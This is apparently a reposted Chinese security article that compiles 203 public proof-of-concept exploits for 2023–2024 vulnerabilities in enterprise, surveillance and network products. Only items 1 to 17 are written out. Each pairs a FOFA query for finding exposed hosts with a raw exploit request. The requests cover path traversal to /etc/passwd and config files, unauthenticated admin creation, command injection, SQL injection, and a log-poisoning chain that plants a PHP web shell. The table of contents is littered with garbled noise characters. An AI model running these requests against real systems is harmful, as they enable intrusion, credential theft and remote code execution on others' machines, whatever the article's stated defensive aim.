Internet Public Vulnerability Compilation 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is reproduced from 网络安全新视界; author: 网络安全新视界

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of attacks in offensive/defensive exercises; we hope this article helps with defense. Defenders can use its contents for risk triage.
Sources: This article covers 203 PoCs for high-severity vulnerabilities published in China and abroad between September 2023 and May 2024. All were collected from other public accounts or websites on the Internet and compiled for publication by the 网络安全新视界 team.
Patches: All vulnerabilities are public; for patches or remediation plans, contact the product vendor.

Content: Owing to length limits, a few PoCs that are too long are replaced with the word PAYLOAD; search for the full PoC yourself if needed.

Legal: If any content infringes a party's legal rights, contact the 网络安全新视界 team via the backend to have it removed.

Statement

To simplify the process and make browsing easier, there is no "reply to get the full list". This article is the most complete version available; when using it, press F12 and search by keyword.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).
! \: S, A1 ~9 S$ A
" K4 f" _: T2 T' L: J; Y目录" g# b s3 [. E/ ?/ \- m3 o7 _9 {
" n" X2 a0 C3 Z" P01( Q6 |( C# G) s" `1 _6 k
) l0 f( K4 D8 B! ~5 B6 E
1. StarRocks MPP数据库未授权访问
" s. S3 ]6 Q( l2. Casdoor系统static任意文件读取$ |9 B# h& x, `& b
3. EasyCVR智能边缘网关 userlist 信息泄漏* V( r, f2 ^& L) G
4. EasyCVR视频管理平台存在任意用户添加
. i; Y; \! S/ Q o9 I4 j5. NUUO NVR 视频存储管理设备远程命令执行* }/ e0 @6 X; S2 Y. J! a9 `
6. 深信服 NGAF 任意文件读取
. N: M( L4 q! d$ H1 V z, T# n$ \7. 鸿运主动安全监控云平台任意文件下载
0 D7 C0 ?, e4 t8 u: {% L7 @, @0 S8. 斐讯 Phicomm 路由器RCE
, ]; t8 P6 R/ f) m0 o. h& V6 q1 A9. 稻壳CMS keyword 未授权SQL注入
, |, S" S$ W/ @" |4 c+ F* J10. 蓝凌EIS智慧协同平台api.aspx任意文件上传' v/ z2 Z* z) A, J0 }8 G
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入- V3 ?% [5 h, O0 P
12. Jorani < 1.0.2 远程命令执行
) e. R0 O- q; {7 {( X* G13. 红帆iOffice ioFileDown任意文件读取# L# b- c9 w+ T- D! a' W, m
14. 华夏ERP(jshERP)敏感信息泄露( t B: g Q) ]) ?4 J' l, F4 p
15. 华夏ERP getAllList信息泄露
9 s8 I* c) F. A0 j9 b3 ]16. 红帆HFOffice医微云SQL注入6 U% z- O# _# X) J# S, l
17. 大华 DSS itcBulletin SQL 注入; @ p' k) I3 Z$ o
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
2 S$ X- O) r4 [& s, K. v3 t19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入% [3 v/ W* O7 U( I
20. 大华ICC智能物联综合管理平台任意文件读取
! o3 r) O4 ~0 n F+ y21. 大华ICC智能物联综合管理平台random远程代码执行
; m6 k8 \2 J5 v; ^/ J; r6 W22. 大华ICC智能物联综合管理平台 log4j远程代码执行- ]% Y8 U9 R0 ]$ g! q+ v
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行6 d/ c+ }2 V- |0 N1 v7 Z
24. 用友NC 6.5 accept.jsp任意文件上传
8 N4 }& o W3 j! G! U25. 用友NC registerServlet JNDI 远程代码执行* ^* a) @" K- O$ p3 [* k+ j
26. 用友NC linkVoucher SQL注入6 ^5 Y4 V2 \ }: i
27. 用友 NC showcontent SQL注入
5 {' i1 s( z" `: N) F4 M28. 用友NC grouptemplet 任意文件上传
# L3 S) B, c' w29. 用友NC down/bill SQL注入- D3 W0 G0 Q; W7 I5 g
30. 用友NC importPml SQL注入
. _ ^- R; R$ f- T6 X31. 用友NC runStateServlet SQL注入2 f% p- Z$ X+ p9 h, f F# v
32. 用友NC complainbilldetail SQL注入
, J( a2 ~9 t' z! l7 C33. 用友NC downTax/download SQL注入+ w, a) f" d+ G
34. 用友NC warningDetailInfo接口SQL注入( ~4 X3 v: n4 u6 M) N6 q! }" ^
35. 用友NC-Cloud importhttpscer任意文件上传
; p- S. L- m) @1 V; Q7 l" K36. 用友NC-Cloud soapFormat XXE! v6 W- I( o h6 _1 X9 u: y/ @
37. 用友NC-Cloud IUpdateService XXE
# x# ]8 _/ Y" U- T- P. B7 J38. 用友U8 Cloud smartweb2.RPC.d XXE
{2 s! ?7 X' _: K5 A T39. 用友U8 Cloud RegisterServlet SQL注入
, i n7 m+ z3 ^0 ^* P9 y( O( l40. 用友U8-Cloud XChangeServlet XXE
5 ~6 h1 u& o0 Y5 o6 |41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 k4 x- E. F- k9 k1 H5 D42. 用友GRP-U8 SmartUpload01 文件上传
& \: v7 Z5 [3 e9 X5 W9 x- ~3 F& B43. 用友GRP-U8 userInfoWeb SQL注入致RCE* ], _0 W* P; c: _3 f% n0 D/ b" d
44. 用友GRP-U8 bx_dj_check.jsp SQL注入
+ @8 @% P: |, w! \* o. z2 V( o5 q- O45. 用友GRP-U8 ufgovbank XXE
4 y. ^/ @* s2 M4 {1 d4 E7 d46. 用友GRP-U8 sqcxIndex.jsp SQL注入
* w6 J+ i9 j. t0 L$ a O3 m% v47. 用友GRP A++Cloud 政府财务云 任意文件读取
H9 l! h# J7 H! Y6 d% W48. 用友U8 CRM swfupload 任意文件上传7 J+ g+ b0 z9 y" z
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
9 W( A7 C% c: @50. QDocs Smart School 6.4.1 filterRecords SQL注入* f' O3 M: n1 ^9 s( v" L
51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入: [0 \5 ^, Q5 r+ |/ \6 X3 W
52. 泛微E-Office json_common.php sql注入
1 K$ e0 c$ @6 D+ }7 Y( m3 U& {) ]; O53. 迪普 DPTech VPN Service 任意文件上传* a" L8 }0 U* \* j1 t
54. 畅捷通T+ getstorewarehousebystore 远程代码执行. t* B$ @8 S0 ]( d/ w- Z/ f8 [3 l
55. 畅捷通T+ getdecallusers信息泄露
/ l; k6 {3 A! Z( {# c* y$ ^56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE/ Q: {: _4 S& S: \; R/ M/ Z
57. 畅捷通T+ keyEdit.aspx SQL注入
7 N# W5 f8 o% i- N( {$ r& v. @9 s58. 畅捷通T+ KeyInfoList.aspx sql注入
$ t! p- B/ F: C7 l0 j( s7 D. D: |1 j59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行) ^3 P0 |& X5 n. _' c( B
60. 百卓Smart管理平台 importexport.php SQL注入
* H$ p) M! d' Q0 m1 B% p) e61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
9 a/ {% l( G; E% n" r$ B. ]62. IP-guard WebServer 远程命令执行
5 V8 u x6 i, y8 x$ L63. IP-guard WebServer任意文件读取/ f- B6 W. _: ]4 u {
64. 捷诚管理信息系统CWSFinanceCommon SQL注入
$ l( ~3 H' Y8 ^6 X" Q- C+ ?3 ]/ ?65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过4 }+ a: S; g; f+ f: u
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
$ A+ g& {: N0 d: S7 K4 l67. 万户ezOFFICE wpsservlet任意文件上传
. l+ }* \+ R; K; @68. 万户ezOFFICE wf_printnum.jsp SQL注入2 G1 R* h" o1 i3 b$ I
69. 万户 ezOFFICE contract_gd.jsp SQL注入- @) [" b! d0 W7 d3 C' D
70. 万户ezEIP success 命令执行6 V0 b# O( [: A8 D; }
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入$ K, y2 q5 V2 K3 s% T* F
72. 致远OA getAjaxDataServlet XXE9 I+ f, { j% q. Y
73. GeoServer wms远程代码执行( E9 X4 L2 f( ^! Z1 t) c
74. 致远M3-server 6_1sp1 反序列化RCE
. j M( c4 N3 H( y& ?* J, M1 ]75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE4 ]% k' q1 F1 e% R
76. 新开普掌上校园服务管理平台service.action远程命令执行
0 k' A0 z3 F0 R+ v _) O77. F22服装管理软件系统UploadHandler.ashx任意文件上传
9 t5 f, r6 P( @78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
8 R2 _( f/ b4 L2 L79. BYTEVALUE 百为流控路由器远程命令执行
) o& P+ |! ~* p0 R' g80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传5 w. A/ i- r" I) `& p
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露5 l# D) K: U0 ]. h# W
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行1 K/ E3 k4 s u1 k. t
83. JeecgBoot testConnection 远程命令执行
, i$ Y' b$ j* Q84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
: }2 S K/ {: i- y/ B85. SysAid On-premise< 23.3.36远程代码执行
2 j; Q$ c" ?& m/ T86. 日本tosei自助洗衣机RCE
0 z# q( k; [8 `( P! G87. 安恒明御安全网关aaa_local_web_preview文件上传
$ M, B- C; `& D n3 _4 W88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行* w0 G& t K4 d7 V
89. 致远互联FE协作办公平台editflow_manager存在sql注入- g% X/ ]# U/ y3 Q+ T5 x
90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
s9 P7 h2 {5 @$ b& u91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取8 U. \8 n) {3 Z# j- F9 L7 z
92. 海康威视运行管理中心session命令执行
$ a1 Y! B+ C' {: q' n93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传& `* d- {- U1 j4 Z* k
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
' D9 q: ?! z/ u4 n0 V/ U* X, m95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行
! T' ^$ Z2 G; q/ Y96. Apache OFBiz 18.12.11 groovy 远程代码执行' Y# m) t2 ]4 {4 H; S' \
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行' T7 `& c- R {8 p3 C; J
98. SpiderFlow爬虫平台远程命令执行9 I' N! o0 F( s/ N) _6 Y0 X1 C* c
99. Ncast盈可视高清智能录播系统busiFacade RCE
4 M V9 O' `# }5 R6 i ^100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传& B8 ?1 E: u8 U$ x4 }4 H3 z
101. ivanti policy secure-22.6命令注入
5 q$ z. _/ z" |3 d102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
$ k4 C/ Q9 F- _/ X* @103. Ivanti Pulse Connect Secure VPN XXE+ E3 t) Z# K5 k" n
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露9 h7 q9 M" j/ Y8 A2 w4 d" @& J* r; o1 m
105. SpringBlade v3.2.0 export-user SQL 注入 M' t x2 {, h& @' Y+ T, u* O3 B
106. SpringBlade dict-biz/list SQL 注入
. d' g3 B. q9 G6 i, |( L107. SpringBlade tenant/list SQL 注入
0 k- j8 N3 S2 r5 |108. D-Tale 3.9.0 SSRF8 E; t; |6 S2 _
109. Jenkins CLI 任意文件读取8 D& z" ?0 x/ U' N' u8 I: c
110. Goanywhere MFT 未授权创建管理员
9 T) s4 o0 L7 b2 Y" n/ G111. WordPress Plugin HTML5 Video Player SQL注入
) j" J* g+ H; w- J+ b* c112. WordPress Plugin NotificationX SQL 注入
6 Z. T2 X# v# e9 j& k113. WordPress Automatic 插件任意文件下载和SSRF
& f0 ?' @+ H# N$ A) V114. WordPress MasterStudy LMS插件 SQL注入& @0 z b4 v) w2 R# K2 r' ?7 d4 f
115. WordPress Bricks Builder <= 1.9.6 RCE* g$ ^2 C; p# @( w2 a6 K0 {1 y
116. wordpress js-support-ticket文件上传4 w0 v2 x6 U( D' n
117. WordPress LayerSlider插件SQL注入) F% v2 E Z; X P( h
118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
4 {3 k! V( k% W119. 北京百绰智能S20后台sysmanageajax.php sql注入
& c5 `7 D" W6 {% G- `0 C( q120. 北京百绰智能S40管理平台导入web.php任意文件上传$ K& z8 d5 j8 \; y! n
121. 北京百绰智能S42管理平台userattestation.php任意文件上传' v9 x" X; C1 H! \+ U
122. 北京百绰智能s200管理平台/importexport.php sql注入
' |; \& }! ]7 q/ C2 _123. Atlassian Confluence 模板注入代码执行- f7 Z F& D3 _# s! W9 }+ z5 F- ]/ Q
124. 湖南建研工程质量检测系统任意文件上传' p! J# ]2 r% D' X; t! n' W8 v! Y
125. ConnectWise ScreenConnect身份验证绕过
2 x$ G- Q6 R# d# M) d! M126. Aiohttp 路径遍历
" [6 k! c: ?% h7 U, y1 S1 S127. 广联达Linkworks DataExchange.ashx XXE
7 z w0 W R) \( G) Q6 y( d128. Adobe ColdFusion 反序列化1 T* n8 z( Q( N K& l2 T
129. Adobe ColdFusion 任意文件读取' p' T& W6 A$ g7 m
130. Laykefu客服系统任意文件上传
8 ]3 ~6 J+ p- C131. Mini-Tmall <=20231017 SQL注入
# ?0 n- p4 [) z4 [2 \132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过7 Y% l3 A/ a! y2 n- o# l' C
133. H5 云商城 file.php 文件上传
2 J I: p3 Z d* w, M5 F+ y134. 网康NS-ASG应用安全网关index.php sql注入. w- o' L. S: ?3 Z
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
) x/ w" Y7 u, X3 j C9 h4 q136. NextChat cors SSRF! m7 d+ j8 U# T4 T+ I
137. 福建科立迅通信指挥调度平台down_file.php sql注入6 W$ x, E/ k! g- D/ T" `5 b
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
; D, X4 O& C" d- ^# o* ~139. 福建科立讯通信指挥调度平台editemedia.php sql注入
/ {4 S# b$ c' h6 X" @140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入
& T0 R( w0 X2 x+ k# c6 N141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
* A% ~" I$ w3 S6 Y( Z! a142. CMSV6车辆监控平台系统中存在弱密码9 l% @! X" O) V
143. Netis WF2780 v2.1.40144 远程命令执行; x0 T: @0 w3 p; G
144. D-Link nas_sharing.cgi 命令注入, ?2 \- X/ k8 e" ~
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入: e1 g2 f. _2 b. p7 U L! Z
146. MajorDoMo thumb.php 未授权远程代码执行
7 Z' @+ K! n0 A2 l& `0 m0 t147. RaidenMAILD邮件服务器v.4.9.4-路径遍历
2 l: R% p6 C' q5 \" x148. CrushFTP 认证绕过模板注入8 C% T4 u) f0 n( X% l( \& P
149. AJ-Report开源数据大屏存在远程命令执行1 w, @$ j5 g/ f% {* o
150. AJ-Report 1.4.0 认证绕过与远程代码执行
3 q: y: k- V2 B4 _7 b151. AJ-Report 1.4.1 pageList sql注入
5 p( p& `7 u* M: o; u) t6 X: d152. Progress Kemp LoadMaster 远程命令执行$ D0 ~; h4 `( s1 S
153. gradio任意文件读取* j5 Z% v; J g' e5 H
154. 天维尔消防救援作战调度平台 SQL注入
# M9 a/ `7 f4 l, r. F/ J, u2 O155. 六零导航页 file.php 任意文件上传
5 v; g( I/ J/ H2 A- i! E( y156. TBK DVR-4104/DVR-4216 操作系统命令注入
3 z; ^. i3 Y7 f( X& X157. 美特CRM upload.jsp 任意文件上传
4 m8 o/ z. [5 q# w7 _4 U. S2 B158. Mura-CMS-processAsyncObject存在SQL注入
8 g# }1 E3 K# J% c( T% D159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
* u7 i* w- d& @( }5 x2 b160. Sonatype Nexus Repository 3目录遍历与文件读取6 [% m# z1 B& Z9 X; U, n* L
161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传+ z: E% O- \" C1 @! K
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传* t7 `- Z. c; x. a
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
1 ~( k" x! [0 v% a; q/ [. H164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传" B4 @; x; a% k0 J7 [; V( V* n6 Q
165. OrangeHRM 3.3.3 SQL 注入2 u6 s. e# S8 K! E) Z8 ]0 h
166. 中成科信票务管理平台SeatMapHandler SQL注入
# s: J( a+ B! B S% w& n167. 精益价值管理系统 DownLoad.aspx任意文件读取6 U; p% m* x. X9 i8 i/ u% W2 g, y
168. 宏景EHR OutputCode 任意文件读取' e- C; J+ ?- M, ]+ y& K
169. 宏景EHR downlawbase SQL注入
8 ? {! |; t1 b+ A/ b170. 宏景EHR DisplayExcelCustomReport 任意文件读取
5 U/ D+ L% d4 K( a171. 通天星CMSV6车载定位监控平台 SQL注入9 L* m' H. K( A+ i3 D3 N5 h& D, x
172. DT-高清车牌识别摄像机任意文件读取
4 b* O7 L5 u- E; x+ p* A0 D& W173. Check Point 安全网关任意文件读取0 i3 G r8 W; {) g& P: m
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
7 p# _- H$ D- n1 W: F9 m% N b175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
+ F$ B# j$ U: ~& ]$ y176. 电信网关配置管理系统 rewrite.php 文件上传
! {# t: j( s3 ]; A3 i( Y177. H3C路由器敏感信息泄露# `: f4 H: j0 a2 s: O
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
1 L1 [5 s2 I: c4 x; W6 V; _' B7 D" {179. 建文工程管理系统存在任意文件读取
G: z5 e) m$ T, p4 j180. 帮管客 CRM jiliyu SQL注入" r- E. T* s; r& s, s
181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入 E2 J$ D* Y: d$ e9 L5 C3 |
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建8 I" ^. t9 K, p" M7 \$ s F
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
# E: x1 _$ B: c+ D! L$ A184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加4 K) p4 I4 G( N* k6 C% L/ W1 p
185. 瑞友天翼应用虚拟化系统SQL注入
" H7 d# A* I2 T9 p& F! b, ?186. F-logic DataCube3 SQL注入) l. K' C: @# n m% `, {4 r
187. Mura CMS processAsyncObject SQL注入; B6 r, L* r) e0 S( N# n4 W
188. 叁体-佳会视频会议 attachment 任意文件读取
- j$ z, y. i" L- V( K189. 蓝网科技临床浏览系统 deleteStudy SQL注入
0 u: C2 y k) @0 h; Q190. 短视频矩阵营销系统 poihuoqu 任意文件读取
8 E% }* J. ^* o; k9 K191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入& f# h+ g% w5 L! \' ]
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传1 c( J0 Z) l' h6 D% p) f9 i9 S3 M
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行! ]: \- J9 N9 y q
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
* B9 h3 p+ R8 } e2 k195. 飞鱼星上网行为管理系统 send_order.cgi命令执行" Z5 C* U8 m! w( c M6 Y M
196. 河南省风速科技统一认证平台密码重置& I" ~* a; K0 z
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入$ X) B/ i, \. d0 v( J) |
198. 阿里云盘 WebDAV 命令注入
_6 I) I. \8 S199. cockpit系统assetsmanager_upload接口 文件上传
4 C# x; C) G# i, p6 i200. SeaCMS海洋影视管理系统dmku SQL注入. K7 I) O0 L8 |# {' M. E
201. 方正全媒体新闻采编系统 binary SQL注入8 T: k% k: b' [4 ^7 k
202. 微擎系统 AccountEdit任意文件上传
) ?) G, Y) h. ]& Z5 a203. 红海云EHR PtFjk 文件上传! p( h5 q; k' k' `
. B# h' e2 X5 U
POC列表
) D5 j* ] G* W( J% E! I$ a1 F% s; l- _; k9 a
02
. l# D$ {9 _; C* F% r( s# @8 L% }; B3 h+ O" b
1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL


2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx


4. EasyCVR video management platform arbitrary user creation
FOFA: title="EasyCVR"
Replace the password value with the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1


5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx


6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:


7. Hongyun active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:


8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging in to the backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-1 login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--


9. DocCMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--


11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip


The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding


Step 2: POST request; the written function executes a base64-encoded command taken from a request header.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPassword


Step 3: send the following request to the lab target to run the id command; the header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip


14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed data includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip


16. Hongfan HFOffice Yiweiyun SQL injection
FOFA: title="HFOffice"
The PoC calls a database function to compute the MD5 of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
